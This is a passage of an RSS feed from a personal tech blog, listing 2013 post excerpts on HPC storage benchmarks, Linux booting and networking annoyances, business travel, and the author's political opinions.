      <pubDate>Thu, 20 Jun 2013 16:09:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/very-fast-cloud-scale-tightly-coupled-computing-and-storage/</guid>
      <description>I&amp;rsquo;ve been hinting at, and alluding to, a benchmark we (the day job) ran on a new product for a while. I took a month to rerun these tests, verifying everything. I wanted to make sure that we got this right. Because these are big numbers. Then we sat on it for another month, to give ourselves time to reflect: what would people&amp;rsquo;s reaction be? We slowly leaked a few pointers to people.</description>
    </item>
    
    <item>
      <title>Contemplating replacing the whole init script for stateless booting</title>
      <link>https://blog.scalability.org/2013/06/contemplating-replacing-the-whole-init-script-for-stateless-booting/</link>
      <pubDate>Wed, 19 Jun 2013 20:49:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/contemplating-replacing-the-whole-init-script-for-stateless-booting/</guid>
      <description>It&amp;rsquo;s probably fair to say that the CentOS/RHEL startup mechanism is, well, broken beyond repair for anything but trivial cases. Out of the box, NFS root doesn&amp;rsquo;t work, and it&amp;rsquo;s very &amp;hellip; extraordinarily &amp;hellip; hard &amp;hellip; to make it work. iSCSI and other connection mechanisms don&amp;rsquo;t work. This has been the case since 6.0. 6.4 continues the long tradition of working for trivial cases, and not working for anything remotely more interesting.</description>
    </item>
    
    <item>
      <title>Two screwups in two days</title>
      <link>https://blog.scalability.org/2013/06/two-screwups-in-two-days/</link>
      <pubDate>Wed, 12 Jun 2013 19:14:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/two-screwups-in-two-days/</guid>
      <description>So the day job released some PR. I paid attention to the content, but not to the title. Unfortunately, I should have. We set records for the 2.8 version of kdb+. The title suggests otherwise. Call this a Mea Culpa, as I had approved the content before I saw the new results with the 3.1 version. So the PR went out, and I think I&amp;rsquo;ve got egg on my face :( .</description>
    </item>
    
    <item>
      <title>Crazy travel schedule ahead</title>
      <link>https://blog.scalability.org/2013/06/crazy-travel-schedule-ahead/</link>
      <pubDate>Mon, 10 Jun 2013 16:37:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/crazy-travel-schedule-ahead/</guid>
      <description>Off to Chicago tonight to present at the STAC Summit tomorrow. Then meeting customers on Wednesday, phone calls, and a partner event. Thursday, back to Detroit, then I fly out to NYC to meet customers on Friday. Back Saturday morning for our style&amp;rsquo;s national karate tournament (and I am very behind in my practice). Then Sunday back to NY to present Monday at the STAC Summit in NYC. Back to Detroit on Tuesday, then Friday, in theory, I have 10 days off for vacation.</description>
    </item>
    
    <item>
      <title>You can&#39;t make this stuff up, 10-June-2013 edition</title>
      <link>https://blog.scalability.org/2013/06/you-cant-make-this-stuff-up-10-june-2013-edition/</link>
      <pubDate>Mon, 10 Jun 2013 15:59:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/you-cant-make-this-stuff-up-10-june-2013-edition/</guid>
      <description>Link here. Don&amp;rsquo;t want to tax ALL businesses &amp;hellip; out of business? Just some of them? Are you mad? Are you freaking kidding me? Pulling my leg? Very sad. Very very sad. The government should be seeking to reduce taxes to make sure businesses grow, and hire, and spend. Mr. President, the entire role of government in business should be to get out of the way, lest you slow down growth, employment, and spending.</description>
    </item>
    
    <item>
      <title>That&#39;s what now ... 5 live scandals?</title>
      <link>https://blog.scalability.org/2013/06/thats-what-now-5-live-scandals/</link>
      <pubDate>Sat, 08 Jun 2013 17:27:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/thats-what-now-5-live-scandals/</guid>
      <description>[Update] That didn&amp;rsquo;t take long. Looks like the government is angry about all of this. The leak of the leaks that is. And they are going to try to find the culprit, and prosecute them. Any &amp;ldquo;Mea Culpas&amp;rdquo; from them on the fact that this is &amp;hellip; I dunno &amp;hellip; illegal? Er &amp;hellip; no. Most transparent admin &amp;hellip; evuh??? I read something last week which made me laugh. It read &amp;ldquo;tomorrow is Thursday, time for a new scandal&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>You can get a hint of the big test result by watching the rotating banner on the day job home page</title>
      <link>https://blog.scalability.org/2013/06/you-can-get-a-hint-of-the-big-test-result-by-watching-the-rotating-banner-on-the-day-job-home-page/</link>
      <pubDate>Fri, 07 Jun 2013 20:09:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/you-can-get-a-hint-of-the-big-test-result-by-watching-the-rotating-banner-on-the-day-job-home-page/</guid>
      <description>Though the 11 was changed to a 12. That is being reverted. Day job home page is here. As it scrolls by, think &amp;ldquo;Massive, unapologetic, firepower&amp;rdquo;. Writ large. This would pair well with any top500 or !top500 computing system. More to come &amp;hellip; more &amp;hellip; to come !!!</description>
    </item>
    
    <item>
      <title>STAC M3 Audited report is now published</title>
      <link>https://blog.scalability.org/2013/06/stac-m3-audited-report-is-now-published/</link>
      <pubDate>Fri, 07 Jun 2013 19:53:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/stac-m3-audited-report-is-now-published/</guid>
      <description>See here. Take home message: Delivered the fastest response time in the NBBO benchmark compared to all publicly disclosed results to date for all systems (STAC-M3.β1.1T.NBBO.LAT2). Delivered the fastest WRITE results compared to all publicly disclosed results for all systems (STAC-M3.v1.1T.WRITE.LAT2). Among systems using kdb+ 2.8: This system set new records for 5 of the 17 benchmarks (STAC-M3.β1.1T.NBBO.LAT2, STAC-M3.v1.1T.WRITE.LAT2, STAC-M3.β1.10T.STATS-AGG.LAT2, STAC-M3.β1.10T.STATS-UI.LAT2, STAC-M3.β1.1T.STATS-UI.LAT2). Delivered over 2x the performance of the previous best published results for the MKTSNAP benchmark, among systems using spinning disk or flash storage.</description>
    </item>
    
    <item>
      <title>The big test to which I&#39;ve alluded</title>
      <link>https://blog.scalability.org/2013/06/the-big-test-to-which-ive-alluded/</link>
      <pubDate>Wed, 05 Jun 2013 13:01:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/the-big-test-to-which-ive-alluded/</guid>
      <description>&amp;hellip; finalizing the text on this, link up soon (it&amp;rsquo;s up but hidden from view). The response from people who&amp;rsquo;ve seen it has been awesome. More very soon. Today, I hope.</description>
    </item>
    
    <item>
      <title>STAC M3 benchmarks to be published tomorrow</title>
      <link>https://blog.scalability.org/2013/06/stac-m3-benchmarks-to-be-published-tomorrow/</link>
      <pubDate>Wed, 05 Jun 2013 12:58:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/stac-m3-benchmarks-to-be-published-tomorrow/</guid>
      <description>I&amp;rsquo;ve got a few things to add to the report today, and then we will have the STAC group publish the report. Performance is &amp;hellip; er &amp;hellip; very &amp;hellip; very &amp;hellip; good. A few tests which won&amp;rsquo;t favor our design as compared to massively wide striped disks were better on other kit. But I am blown away at how our little 2 socket server did in comparison to other, better known kit.</description>
    </item>
    
    <item>
      <title>Finally fixed the day job DNS</title>
      <link>https://blog.scalability.org/2013/06/finally-fixed-the-day-job-dns/</link>
      <pubDate>Wed, 05 Jun 2013 12:50:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/finally-fixed-the-day-job-dns/</guid>
      <description>This took far longer than it should have. This was in part due to my initial decision (since changed) to use dbndns at two sites (one internal, one in the cloud). The TL;DR version: dbndns and its parent project, djbdns, are a royal pain to get up, operational, and stable. I tried the packaged versions, the source, etc. Several different distributions (CentOS 6.x, Ubuntu 12.04, &amp;hellip;). 4 weeks into this mess, I asked myself the critical question.</description>
    </item>
    
    <item>
      <title>Article on a likely causation vector for global warming</title>
      <link>https://blog.scalability.org/2013/06/6049/</link>
      <pubDate>Sun, 02 Jun 2013 17:59:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/6049/</guid>
      <description>I am not a huge fan of the science and accompanying rhetoric around &amp;ldquo;global warming.&amp;rdquo; And it&amp;rsquo;s not because of the Koch brothers (or any other weapons grade conspiracy theory idiocy on the part of certain activist elements of our society). It&amp;rsquo;s because the &amp;ldquo;science&amp;rdquo;, or more precisely, the theory that currently holds sway in large swaths of academia and public policy circles, appears to generate testable hypotheses that are not matched against empirical observations.</description>
    </item>
    
    <item>
      <title>Wish I was going to ISC13</title>
      <link>https://blog.scalability.org/2013/05/wish-i-was-going-to-isc13/</link>
      <pubDate>Fri, 31 May 2013 15:13:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/05/wish-i-was-going-to-isc13/</guid>
      <description>I was &amp;hellip; but then it was determined that I needed to be giving 2 of the STAC summit talks in Chicago and NY on the day job&amp;rsquo;s systems. Then this week, Tianhe-2 info came out, and &amp;hellip; well &amp;hellip; WOW! Great job guys! (ob-day job: &amp;ldquo;could we interest you in some monstrously fast storage to go with that space-time fabric warping super?&amp;rdquo;) I was speaking recently with a VC we had talked to in early 2002 about accelerators.</description>
    </item>
    
    <item>
      <title>Should be able to talk about the benchies early next week</title>
      <link>https://blog.scalability.org/2013/05/should-be-able-to-talk-about-the-benchies-early-next-week/</link>
      <pubDate>Thu, 30 May 2013 01:44:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/05/should-be-able-to-talk-about-the-benchies-early-next-week/</guid>
      <description>Got confirmation from marketing folks that I won&amp;rsquo;t cause irreparable damage if I just put the link up. Next week. Early.</description>
    </item>
    
    <item>
      <title>New posts up at the day job blog, and yes, we now have a day job blog!</title>
      <link>https://blog.scalability.org/2013/05/new-posts-up-at-the-day-job-blog-and-yes-we-now-have-a-day-job-blog/</link>
      <pubDate>Wed, 29 May 2013 14:38:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/05/new-posts-up-at-the-day-job-blog-and-yes-we-now-have-a-day-job-blog/</guid>
      <description>See here: ( http://scalableinformatics.com/blog/ ) The way I looked at it, I needed a place to talk more about products/solutions/work without having my own personal opinions on myriad things woven throughout. That is, scalability.org is something of mine personally, that I write for, based upon whatever itch I wish to scratch. The blog at the day job lets us (collectively) talk about cool things without having that &amp;ldquo;me/mine&amp;rdquo; thing intermix. I&amp;rsquo;ll be updating here of course as well.</description>
    </item>
    
    <item>
      <title>What an intense 3 weeks</title>
      <link>https://blog.scalability.org/2013/05/what-an-intense-3-weeks/</link>
      <pubDate>Mon, 27 May 2013 21:03:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/05/what-an-intense-3-weeks/</guid>
      <description>I can&amp;rsquo;t talk publicly about everything yet; it&amp;rsquo;s just been so demanding of my time. I&amp;rsquo;ve run and debugged benchmarks, flown in to meet customers and others, generated many quotes, and given many presentations. On top of this, I&amp;rsquo;ve got two hard deadlines for getting stuff written that I have to hit before I can write anything here. So let me crank on those in the next 24 hours, and I&amp;rsquo;ll update.</description>
    </item>
    
    <item>
      <title>When you&#39;ve lost Jon Stewart ...</title>
      <link>https://blog.scalability.org/2013/05/when-youve-lost-jon-stewart/</link>
      <pubDate>Thu, 16 May 2013 12:16:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/05/when-youve-lost-jon-stewart/</guid>
      <description>Here in the US, we have a number of scandals brewing. Many in the party in control of the White House and the Senate would like to have you believe that these are in fact tempests in teapots. In this case, there are at least 2 Nixonian scandals going non-linear here, with a 3rd trying to break through. The political left is doing all it can to wave off one of them, though this is getting progressively harder by the day as more information comes out.</description>
    </item>
    
    <item>
      <title>What would you do if you had &#34;infinite&#34; bandwidth and IOPs coupled directly to your computing?</title>
      <link>https://blog.scalability.org/2013/05/what-would-you-do-if-you-had-infinite-bandwidth-and-iops-coupled-directly-to-your-computing/</link>
      <pubDate>Wed, 08 May 2013 04:27:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/05/what-would-you-do-if-you-had-infinite-bandwidth-and-iops-coupled-directly-to-your-computing/</guid>
      <description>Imagine you have some &amp;hellip; I dunno &amp;hellip; gargantuan amount of bandwidth available, to and from your disks. And you have just positively insane IOP rates, at these very high bandwidths. And then you tightly couple a few hundred processor cores, and a few terabytes of memory. What would you consider &amp;ldquo;gargantuan&amp;rdquo; bandwidth? What would you consider &amp;ldquo;insane&amp;rdquo; IOP rates? And most importantly, if you had the type of IO fire power you considered gargantuan and insane, what would you do with this?</description>
    </item>
    
    <item>
      <title>Don&#39;t know if I mentioned it, but the day job has a new website</title>
      <link>https://blog.scalability.org/2013/04/dont-know-if-i-mentioned-it-but-the-day-job-has-a-new-website/</link>
      <pubDate>Sun, 28 Apr 2013 23:25:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/04/dont-know-if-i-mentioned-it-but-the-day-job-has-a-new-website/</guid>
      <description>Take a gander. Some things are missing, and our marketing folks are developing the content where needed, and revising it where we have existing content. It&amp;rsquo;s quite refreshing to see this. It will get better over time. It&amp;rsquo;s running in our facility now, and likely we&amp;rsquo;ll have a few clones in the cloud as well. But that&amp;rsquo;s for later.</description>
    </item>
    
    <item>
      <title>Having fun writing a presentation about molecular dynamics and big data</title>
      <link>https://blog.scalability.org/2013/04/having-fun-writing-a-presentation-about-molecular-dynamics-and-big-data/</link>
      <pubDate>Sun, 28 Apr 2013 03:28:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/04/having-fun-writing-a-presentation-about-molecular-dynamics-and-big-data/</guid>
      <description>Who&amp;rsquo;da ever thunk that MD simulations would start to become large enough to present IO and analysis problems? Way way back when the digital supercomputing dinosaurs roamed the earth, looking for problems to crunch on, I simulated gallium arsenide on some of these machines. I&amp;rsquo;d be lucky to get 100 time steps done, in a week, for 64 atoms. 64 atoms in double precision, with position, velocity, and atom type; let&amp;rsquo;s be generous and call this 64 bytes in binary, or 80 bytes, one terminal line, per atom in text.</description>
    </item>
    
    <item>
      <title>Do we really have enough native STEM workers in the US?</title>
      <link>https://blog.scalability.org/2013/04/do-we-really-have-enough-native-stem-workers-in-the-us/</link>
      <pubDate>Fri, 26 Apr 2013 20:01:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/04/do-we-really-have-enough-native-stem-workers-in-the-us/</guid>
      <description>Yes, actually we do. Too many. Turns out that little law of supply and demand does in fact hold true. The higher the demand for something in limited supply, the higher the price (wages) you will pay for it. By applying forces to this law, you impact a number of outcomes. That is, if you start monkeying around with the supply, sure, you can adjust the price you pay for STEM talent.</description>
    </item>
    
    <item>
      <title>Why I am taking a while to post the results</title>
      <link>https://blog.scalability.org/2013/04/why-i-am-taking-a-while-to-post-the-results/</link>
      <pubDate>Mon, 22 Apr 2013 23:31:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/04/why-i-am-taking-a-while-to-post-the-results/</guid>
      <description>In short, I am trying to verify what we measured. It&amp;rsquo;s repeatable; I&amp;rsquo;ve been measuring it for a week now, and having trouble with it, but I want to make absolutely sure I get this correct. Because these are big numbers. Very. Very. Big. It would be annoying if I made a mistake. So I am double/triple/quadruple checking.</description>
    </item>
    
    <item>
      <title>Social Media Overload</title>
      <link>https://blog.scalability.org/2013/04/social-media-overload/</link>
      <pubDate>Mon, 22 Apr 2013 21:32:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/04/social-media-overload/</guid>
      <description>Definition: When the amount of social media that everyone expects you to consume with a myriad of different, incompatible, and often annoying apps, absorbs so much of your time that your productivity drops &amp;hellip; you decide that in the interests of your own personal sanity, you will spend more time with your family, your dog, and your friends, than dealing with {facebook,twitter,linkedin,RANDOM_SOCIAL_MEDIA_NAME} streams which steal time from the important things in life.</description>
    </item>
    
    <item>
      <title>It must be some obscure law of nature</title>
      <link>https://blog.scalability.org/2013/04/it-must-be-some-obscure-law-of-nature/</link>
      <pubDate>Mon, 22 Apr 2013 20:40:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/04/it-must-be-some-obscure-law-of-nature/</guid>
      <description>&amp;hellip; whereby when I have the least time to spend on a particular task, requests arrive in an ordering such that I maximize the time spent on that task using the least efficient mechanisms possible. Put another way, when I am busy, more people seek more of my time to handle things that I shouldn&amp;rsquo;t need to be involved in. Or another way &amp;hellip; simple things should be trivial, complex things possible, and yet the universe appears to arrange itself so that simple things become complex, and complex things become impossible.</description>
    </item>
    
    <item>
      <title>Back with some benchmarks for siCloud</title>
      <link>https://blog.scalability.org/2013/04/back-with-some-benchmarks-for-sicloud/</link>
      <pubDate>Mon, 22 Apr 2013 01:01:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/04/back-with-some-benchmarks-for-sicloud/</guid>
      <description>For the day job. They are &amp;hellip; well &amp;hellip; pretty nice. What is siCloud you might ask? Well, think a very &amp;hellip; very fast storage and computing cloud, leveraging many technologies we&amp;rsquo;ve developed. You will be hearing more about this soon. And I&amp;rsquo;ll show some numbers and pictures in another post. But before I get them up, anyone want to hazard a guess on the aggregate bandwidth and IOP rate for this system?</description>
    </item>
    
    <item>
      <title>Again, terribly busy</title>
      <link>https://blog.scalability.org/2013/04/again-terribly-busy/</link>
      <pubDate>Tue, 16 Apr 2013 14:38:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/04/again-terribly-busy/</guid>
      <description>Have an order which is absorbing all of my cycles, and this is coupled with a nice springtime cold, and an elbow injury. Now if my dog bites me, my month will be complete. Will start posting soon, once I get the burn-in running. To give you a sense of the size of this order, we are installing additional power and AC capacity in our lab (it&amp;rsquo;s happening now). We just asked our landlord if they have a larger space in this complex (it&amp;rsquo;s built into our lease, as we weren&amp;rsquo;t sure of our growth rates), and they really don&amp;rsquo;t have anything we can use, so we might just suffer here for another year, and build up capacity in NJ.</description>
    </item>
    
    <item>
      <title>Off to HPC on Wall Street</title>
      <link>https://blog.scalability.org/2013/04/off-to-hpc-on-wall-street/</link>
      <pubDate>Sat, 06 Apr 2013 02:03:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/04/off-to-hpc-on-wall-street/</guid>
      <description>Looking forward to this. Our booth is smaller, but in a higher traffic area. We have 2 systems with us, a siFlash and a 60 bay JackRabbit. And we are putting together a small get-together after the show. This should be fun. I am looking forward to it. I&amp;rsquo;ll try to tweet from the show floor.</description>
    </item>
    
    <item>
      <title>This will not end well</title>
      <link>https://blog.scalability.org/2013/04/this-will-not-end-well/</link>
      <pubDate>Mon, 01 Apr 2013 17:06:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/04/this-will-not-end-well/</guid>
      <description>Watching the slow motion train wreck in Cyprus made me wonder exactly whom the target of the money grab was. And more importantly, whether or not the people making demands had any clue that their victory was, at best, Pyrrhic, and at worst, a serious contagion. Any financial system in operation is built upon various levels of trust, implicitly in the case of the least risky capital storage system. You know that you can trust, within reasonable expectations and parameters, that capital that you deposit there can be retrieved later.</description>
    </item>
    
    <item>
      <title>You think I would learn already</title>
      <link>https://blog.scalability.org/2013/03/you-think-i-would-learn-already/</link>
      <pubDate>Sun, 31 Mar 2013 16:48:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/03/you-think-i-would-learn-already/</guid>
      <description>It&amp;rsquo;s called &amp;ldquo;fractured bone spur, tip of olecranon&amp;rdquo;. It means I&amp;rsquo;ve got a broken bone in my elbow area. My arm is in a sling and immobilized. Got it while sparring at a karate tournament. Landed hard on my elbow due to a slippery floor. Of course it&amp;rsquo;s my right arm, the one I write with. I am typing this with one hand, using the hunt and peck method. Seriously need voice IO for machines.</description>
    </item>
    
    <item>
      <title>Products versus projects</title>
      <link>https://blog.scalability.org/2013/03/products-versus-projects/</link>
      <pubDate>Fri, 29 Mar 2013 15:32:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/03/products-versus-projects/</guid>
      <description>Long ago I pondered
Projects, inherently, are un-finished entities. There are missing things. There are &amp;ldquo;un-implemented features&amp;rdquo; which would be necessary for a product. Like say, an on-off switch, among other things. Products are inherently compromises between design, realities of implementation costs/schedules/complexities, etc. Software developers often get into the endless cycle of tweaking features and improving systems so that they miss target dates. We see this with larger scale projects as well, unless someone adopts the iron-fist rule on adding/tweaking versus shipping/learning/improving $version++.</description>
    </item>
    
    <item>
      <title>Windows 8 is terrible</title>
      <link>https://blog.scalability.org/2013/03/windows-8-is-terrible/</link>
      <pubDate>Tue, 26 Mar 2013 00:05:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/03/windows-8-is-terrible/</guid>
      <description>No, that&amp;rsquo;s unfair to things that are truly terrible. It sets a low mark &amp;hellip; a really &amp;hellip; really &amp;hellip; low mark. Trying to help a relative with adding a printer. A printer that happily works under Windows 7. No issues, just works. Works under Linux on my laptop here. Nothing special, just works. But Windows 8? Oh &amp;hellip; no &amp;hellip; it &amp;hellip; doesn&amp;rsquo;t. Drivers (the built in ones we are told to use) don&amp;rsquo;t work.</description>
    </item>
    
    <item>
      <title>#youknowyouaretravelingwaytoomuchwhen ...</title>
      <link>https://blog.scalability.org/2013/03/youknowyouaretravelingwaytoomuchwhen/</link>
      <pubDate>Mon, 25 Mar 2013 22:49:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/03/youknowyouaretravelingwaytoomuchwhen/</guid>
      <description>&amp;hellip; the guy driving the car rental bus recognizes you and talks about how often you&amp;rsquo;ve been there.</description>
    </item>
    
    <item>
      <title>This simply needs to be said ... Networkmanager must be neutered</title>
      <link>https://blog.scalability.org/2013/03/this-simply-needs-to-be-said-networkmanager-must-be-neutered/</link>
      <pubDate>Sun, 24 Mar 2013 21:47:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/03/this-simply-needs-to-be-said-networkmanager-must-be-neutered/</guid>
      <description>It should never, ever be enabled by a default install on a server. Ever. Under any circumstances. For any reason. I&amp;rsquo;d even argue it should never be installed by default for any reason on a server. Just fixed another NetworkManager-caused problem (TM). Modifying /etc/resolv.conf on a server after I changed the NICs as indicated. I mean &amp;hellip; seriously folks?</description>
    </item>
    
    <item>
      <title>Failing 10GbE NICs</title>
      <link>https://blog.scalability.org/2013/03/failing-10gbe-nics/</link>
      <pubDate>Sun, 24 Mar 2013 18:14:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/03/failing-10gbe-nics/</guid>
      <description>I won&amp;rsquo;t mention the vendor by name here. Needless to say, I am unhappy with the failure rate on their NICs. We had a number of units we bought for internal use as well as for customer use. The NICs would throw various driver exceptions, and kernel panic the machines. It was doing this to our central server this past week, while I had been lighting up KVMs on an app server; specifically, kernel panicking under even moderate load.</description>
    </item>
    
    <item>
      <title>Update on IPMI Console Logger</title>
      <link>https://blog.scalability.org/2013/03/update-on-ipmi-console-logger/</link>
      <pubDate>Sun, 24 Mar 2013 17:59:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/03/update-on-ipmi-console-logger/</guid>
      <description>Config now comes from some nice and simple json, and it handles multiple machines with aplomb. See the git repository for the latest. The config file example is in there, and you can replicate the n01-ipmi section with more nodes trivially. Coming next is getting config from a trusted web server, along with registering the client to the trusted web server. This prevents things like passwords from showing up in the clear, though you can always create a lower privileged user to access the console for monitoring.</description>
    </item>
    
    <item>
      <title>Presentation from Kx 2013 NYC user group meeting up</title>
      <link>https://blog.scalability.org/2013/03/presentation-from-kx-2013-nyc-user-group-meeting-up/</link>
      <pubDate>Thu, 21 Mar 2013 13:56:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/03/presentation-from-kx-2013-nyc-user-group-meeting-up/</guid>
      <description>at the $day job. See it here.</description>
    </item>
    
    <item>
      <title>Time wasting phone call detector regex</title>
      <link>https://blog.scalability.org/2013/03/time-wasting-phone-call-detector-regex/</link>
      <pubDate>Wed, 13 Mar 2013 18:35:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/03/time-wasting-phone-call-detector-regex/</guid>
      <description>So there you are, sitting at your desk trying to do your work. A call comes in, you pick it up. Me: $day_job, Landman speaking Them: I would like to speak to (garbled) about (garbled) meta-Me: [start 15 second BS detector clock filter] Me: I&amp;rsquo;m sorry, I can&amp;rsquo;t hear you &amp;hellip; who are you and what is this call about? Them: (barely audible) I am XYZ PDQ representing ABC DEF, and how is your day going?</description>
    </item>
    
    <item>
      <title>The sequester is here</title>
      <link>https://blog.scalability.org/2013/03/the-sequester-is-here/</link>
      <pubDate>Sat, 09 Mar 2013 16:40:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/03/the-sequester-is-here/</guid>
      <description>Suffice it to say that much hot air was blown over the sequester in the media. Really, there was much tearing of clothes over this. Much righteous indignation that someone in government, somewhere, would have to make (not so very hard) decisions about where to trim budgets. We needed this, as the US government is so completely broken as to not be able to propose a reasonable budget, pass a reasonable budget, nor listen to and work with ideas from other portions of the legislative branch which want to work on reasonable budgets.</description>
    </item>
    
    <item>
      <title>More blurring of lines between platform providers and competitors</title>
      <link>https://blog.scalability.org/2013/03/more-blurring-of-lines-between-platform-providers-and-competitors/</link>
      <pubDate>Sat, 09 Mar 2013 15:36:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/03/more-blurring-of-lines-between-platform-providers-and-competitors/</guid>
      <description>I had pointed out recently that large platform as a service, or pretty much any *aaS type model, where you present your value atop someone else&amp;rsquo;s platform, leveraging their technologies, is ripe for having the *aaS provider decide they want to move into your space. Once you&amp;rsquo;ve done the hard work of proving there is a space in the first place. Well, the Register has an article on this now. I gave a number of specific examples, and pointed out that Amazon isn&amp;rsquo;t the first to do this; Microsoft had previously done this to the level of an art form.</description>
    </item>
    
    <item>
      <title>There are no silver bullets</title>
      <link>https://blog.scalability.org/2013/02/there-are-no-silver-bullets/</link>
      <pubDate>Thu, 28 Feb 2013 05:23:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/there-are-no-silver-bullets/</guid>
      <description>&amp;hellip; and anyone promising you one is selling you something. This is true everywhere, though especially so in massively overhyped markets. There are no secret incantations that will tease actionable insights out of a gargantuan bolus of data. Yet, from all the &amp;ldquo;company X now has a hyper optimized, purple colored Hadoop distro, with a pony&amp;rdquo; announcements, one might think that it was a panacea &amp;hellip; a panopticon with infinite ability to extract the most profound and profitable nuggets from mountains of steaming piles of bits.</description>
    </item>
    
    <item>
      <title>Bow before big data</title>
      <link>https://blog.scalability.org/2013/02/bow-before-big-data/</link>
      <pubDate>Wed, 27 Feb 2013 02:13:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/bow-before-big-data/</guid>
      <description>It&amp;rsquo;s a Dilbert cartoon, located here. Originally seen on the Mu Sigma blog.</description>
    </item>
    
    <item>
      <title>A replacement laptop for my daughter</title>
      <link>https://blog.scalability.org/2013/02/a-replacement-laptop-for-my-daughter/</link>
      <pubDate>Mon, 25 Feb 2013 17:24:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/a-replacement-laptop-for-my-daughter/</guid>
      <description>Her old Dell Inspiron died, again. First it was a motherboard. Then a hard disk. And a cracked bezel. Now it looks like it&amp;rsquo;s a motherboard again. The power supply bits are, IMO, completely unforgivable. Until Dell lets us use a replacement supply that is not manufactured by Dell, we won&amp;rsquo;t be buying Dell laptops. I suspect this will be a while. But this laptop, and my wife&amp;rsquo;s version, have lots of problems.</description>
    </item>
    
    <item>
      <title>Reaching saturation: Our ongoing glut of Ph.D. educated talent</title>
      <link>https://blog.scalability.org/2013/02/reaching-saturation-our-ongoing-glut-of-ph-d-educated-talent/</link>
      <pubDate>Mon, 25 Feb 2013 16:20:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/reaching-saturation-our-ongoing-glut-of-ph-d-educated-talent/</guid>
      <description>Achieving a Ph.D. is one of the highest academic goals one can set. You work insanely hard; you sacrifice income, starting a family, and many other things, in the pursuit of this (in most cases). And when you finish, you are, theoretically, in an upper stratum of accomplishment. Many (including myself) entered into this path, decades ago, based upon data (now known to be either overtly falsified, or completely incompetently analyzed) which suggested a dearth of scientists needed to staff the ever growing college and university departments, and the massively growing industrial scientific community, as a solid rationale for pursuing such a difficult course.</description>
    </item>
    
    <item>
      <title>Why posting has been slow</title>
      <link>https://blog.scalability.org/2013/02/why-posting-has-been-slow/</link>
      <pubDate>Mon, 25 Feb 2013 00:55:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/why-posting-has-been-slow/</guid>
      <description>Time. Basically I have none. I steal some here and there to get things out, but I have been completely swamped. Or I post when I am up late at night/early morning, and can&amp;rsquo;t get to sleep (occasional hazard of running a growing business). On a happy note, the company is growing. We have brought 4 people on board over the last six months, with an additional 2-4 planned near term.</description>
    </item>
    
    <item>
      <title>As the clouds change ...</title>
      <link>https://blog.scalability.org/2013/02/as-the-clouds-change/</link>
      <pubDate>Wed, 20 Feb 2013 00:18:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/as-the-clouds-change/</guid>
      <description>This is going to take a few paragraphs to set up, so please bear with me. One of the harder aspects of building a business atop someone else&amp;rsquo;s platform is the fundamental dependency upon them that you create. Your business depends, to a very large extent, upon their good will, and their desire to grow an ecosystem. Every now and then you get more predatory platform providers. These groups like to take control of larger segments of the ecosystem, and provide a product or service that gets harder for others to compete with, because, in part, they are naturally disadvantaged in doing so.</description>
    </item>
    
    <item>
      <title>ATI experiment update: day 19</title>
      <link>https://blog.scalability.org/2013/02/ati-experiment-update-day-19/</link>
      <pubDate>Tue, 19 Feb 2013 22:06:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/ati-experiment-update-day-19/</guid>
      <description>So here I am, with an ATI W5000 card driving my dual display Linux desktop. I had pulled the NVidia GEForce card, as the driver or the card kept tossing Xid: NVRM errors, that I could not make go away. Googling this error took me back to years of people dealing with similar issues, and never getting a fix. Just reporting the same problem. That was very annoying. The day job has customers with these cards &amp;hellip; exactly what are we supposed to be telling them?</description>
    </item>
    
    <item>
      <title>[Updated] #walkingspam that you cannot easily filter electronically</title>
      <link>https://blog.scalability.org/2013/02/walkingspam-that-you-cannot-easily-filter-electronically/</link>
      <pubDate>Sun, 17 Feb 2013 17:45:49 +0000</pubDate>
      
